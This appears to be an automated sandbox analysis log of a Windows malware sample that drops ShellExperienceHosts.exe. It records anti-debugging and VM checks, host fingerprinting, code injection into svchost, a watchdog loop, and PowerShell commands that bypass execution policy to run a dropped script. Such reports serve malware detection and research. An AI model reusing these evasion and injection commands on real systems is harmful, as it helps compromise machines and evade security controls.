Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeThread sleep count: Count: 5923 delay: -10Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C7BC637 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,3_2_6C7BC637
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_033280F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,3_2_033280F0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03325430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,3_2_03325430
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeThread delayed: delay time: 73000Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: S1Rv3ioghk.exeBinary or memory string: Hyper-V enabled!UEFI Secure Variables (VbsPolicy)
Source: powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: S1Rv3ioghk.exeBinary or memory string: Hyper-V not available
Source: ShellExperienceHosts.exe, 00000003.00000002.3542074440.0000000000712000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: S1Rv3ioghk.exeBinary or memory string: Hyper-V Hypervisor running: %i
Source: S1Rv3ioghk.exeBinary or memory string: XThe system has not the required hardware support (SLAT, VMX, ...) to run the Hypervisor.#Hyper-V hypervisor is not running.
Source: powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
Source: S1Rv3ioghk.exeBinary or memory string: Hyper-V not started
Source: ShellExperienceHosts.exe, 00000003.00000002.3542074440.0000000000712000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeAPI call chain: ExitProcess graph end nodegraph_3-126524
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0332F00A
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6E2FB6 OutputDebugStringA,GetLastError,3_2_6C6E2FB6
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0333054D VirtualProtect ?,-00000001,00000104,?3_2_0333054D
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03327490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,3_2_03327490
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_02230AE4 mov eax, dword ptr fs:[00000030h]3_2_02230AE4
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031A00CD mov eax, dword ptr fs:[00000030h]3_2_031A00CD
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03326790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,3_2_03326790
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,3_2_0332DF10
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0332F00A
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03331F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_03331F67
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C7A0526 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C7A0526
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C85C288 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C85C288
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C7CD34B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C7CD34B
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_10008587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_10008587
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_10006815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10006815
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_022367EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_022367EC

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Contains functionality to inject code into remote processes
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_033277E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,3_2_033277E0
Contains functionality to inject threads in other processes
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_033277E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,3_2_033277E0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe3_2_033277E0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe3_2_033277E0
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe C:\Users\Public\Bulete\program\ShellExperienceHosts.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
Source: ShellExperienceHosts.exe, 00000003.00000003.3340498276.0000000004361000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.3497744924.0000000004361000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2690465523.000000000433D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 minProgram Manager
Source: ShellExperienceHosts.exe, 00000003.00000002.3544211309.0000000004361000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,3_2_03325430
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: GetModuleHandleW,GetProcAddress,EncodePointer,DecodePointer,GetLocaleInfoW,3_2_6C7A2B58
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: GetLocaleInfoW,3_2_6C865A0C
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
